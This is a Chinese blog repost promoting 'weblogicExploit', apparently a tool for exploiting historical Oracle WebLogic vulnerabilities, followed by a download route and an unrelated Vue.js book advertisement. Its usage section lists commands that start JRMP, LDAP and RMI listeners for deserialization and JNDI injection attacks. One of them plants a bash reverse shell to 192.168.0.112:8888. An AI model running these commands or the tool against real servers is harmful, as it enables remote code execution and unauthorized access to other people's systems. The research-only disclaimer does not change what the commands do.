weblogic历史漏洞利用工具 -- weblogicExploit

admin 2022年7月28日01:23:56评论276 views字数 1149阅读3分49秒阅读模式
项目作者:8ypass
项目地址:https://github.com/8ypass/weblogicExploit


一、工具介绍
工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。

weblogic历史漏洞利用工具 -- weblogicExploit


二、安装与使用

1、列出可控payloads
java -jar weblogic.jar -payloads
2、启动JRMPListener
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
3、启动LDAP/RMI
LDAPjava -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618RMIjava -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
4、高版本jndi注入 ldap
java -jar weblogic tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'

java -jar weblogic tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'

三、下载地址:
1、通过项目地址下载
2、关注web安全工具库公众号,后台回复:20220728

四、声明:

仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者不承担任何法律及连带责任。


推荐书籍

加我微信:ivu123ivu,进送书活动群,不定时免费送书


《精通Vue.js:Web前端开发技术详解》

weblogic历史漏洞利用工具 -- weblogicExploit


本书循序渐进地介绍了Vue框架的用法,主要内容包括前后端分离的基本原理、MVVM设计模式、Vue的基本用法、内置指令、自定义指令、计算属性和数据监听、绑定表单、绑定CSS样式、CSS过渡和动画、Vue组件的开发、Vue CLI脚手架工具、路由管理器、组合API、Axios和状态管理等。本书内容通俗易懂,案例丰富,理论和实践紧密结合。本书的范例采用Vue 3,最后一章提供了一个整合前端与后端的综合案例,帮助读者迅速掌握开发实用Web应用的技巧。本书适合所有前端Web开发人员阅读,无论是初学者还是已经有开发经验的从业人员,都能从本书中受益。另外,本书也适合作为相关培训机构的教材。

原文始发于微信公众号(web安全工具库):weblogic历史漏洞利用工具 -- weblogicExploit

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月28日01:23:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   weblogic历史漏洞利用工具 -- weblogicExploithttps://cn-sec.com/archives/1205657.html

发表评论

匿名网友 填写信息